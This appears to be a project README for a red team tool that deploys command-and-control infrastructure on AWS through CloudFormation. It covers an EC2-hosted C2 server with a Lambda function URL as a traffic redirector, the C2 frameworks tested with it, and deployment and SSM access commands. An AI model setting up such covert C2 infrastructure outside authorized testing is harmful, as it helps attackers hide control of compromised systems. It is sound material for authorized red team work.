Red Lambda is an AWS CloudFormation template that automatically deploys red team infrastructure in the cloud. My blog post covers more details about the background of this project.
A basic red team infrastructure is deployed using the lamda.yml
AWS cloudformation template.
Infrastructure includes:
- VPC and Subnet
- EC2 with SSM Enabled to host a C2
- Lambda Function to act as redirector
- Lambda Function URL to expose redirector to internet
The lambda function python code is embedded in the cloudformation template.
However, I've copied it in the lambda.py
file to review.
Personally, I just manually create the Lambda function myself in AWS console using the code from lambda.py
as its pretty quick to do.
The AWS Lambda function can now be run with new versions of Python such as 3.11 or 3.12 with small modifications. Changes to the code and process have been detailed to allow the support of the Python requests
library in newer versions of Lambda and Python since Python 3.7 is no longer supported and the new versions don't provide support by AWS for the Python requests
library naturally, so we have to add it ourselves.
Steps detailed in below section.
Frameworks tested while developing this tool include:
- Cobalt Strike setting data to be sent in message body
- Mythic using the Athena agent using the http profile
- Sliver using the http listener (encountered some throttling issues during high performance)
- Covenant using the http listener with SSL enabled (upload a random pfx cert)
- AWS CLI
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html - AWS CLI Session Manager Plugin
https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-install-plugin.html
From the command line, run the following command to start the creating infrastructure:
aws cloudformation deploy --stack-name Red --template-file red.yml --capabilities CAPABILITY_NAMED_IAM
From the command line, run the following command to destroy the infrastructure:
aws cloudformation delete-stack --stack-name Red
After deploying the infrastructure, use the following aws-cli commands to find necessary information.
List EC2 instances:
aws ec2 describe-instances --query 'Reservations[*].Instances[0].{Name:Tags[?Key==`Name`].Value|[0],Instance:InstanceId,IP:PublicIpAddress, State:State.Name}' --output table
No need for internet facing SSH systems or jump boxes!
Simply use AWS Systems Manager (SSM) from the AWS CLI to interact with your infrastructure.
Access any of the EC2 instances by using the AWS CLI through the aws ssm
command:
aws ssm start-session --target <instance id>
Use SSM to port forward to your local machine:
aws ssm start-session --target <instance id> --document-name AWS-StartPortForwardingSession --parameters "portNumber"=["80"],"localPortNumber"=["1234"]
Note: This is helpful if your C2 has a web management interface or teamserver port that must to accessed locally.
AWS Lambda no longer supports Python 3.7 in 2024, and newer versions of Lambda don’t support the requests
library in Python.
Follow these steps to fix this issue:
- Create an AWS Lambda Layer (One time setup only): The Lambda Layer will allow us to import the Python
requests
library code ourselves which our redirector function will be using.- Use this post to create a zip file of the Python
requests
library which we'll upload as a Lambda Layer in AWS.- Note: Be sure to match your Python version used to create the
requests
library with the Python environment selected for your Lambda function
- Note: Be sure to match your Python version used to create the
- Once you have your
requests
zip package from the above step, in AWS go to Lambda → Layers → Create Layer → Upload the requests.zip package - Select Python 3.11 (or whatever Python version you’re using) → Create
- Use this post to create a zip file of the Python
- Modify your code function to use the updated code in
lambda.py
from this repo to support therequests
library in the newer version of Python - Change Lambda runtime environment to Python 3.11 (or whatever version your
requests
library is using). - Now you're good to go! Test it out to confirm it works.
- You can use
curl
to hit your endpoint and view logs on the C2 server to ensure the request are coming through without errors.
- You can use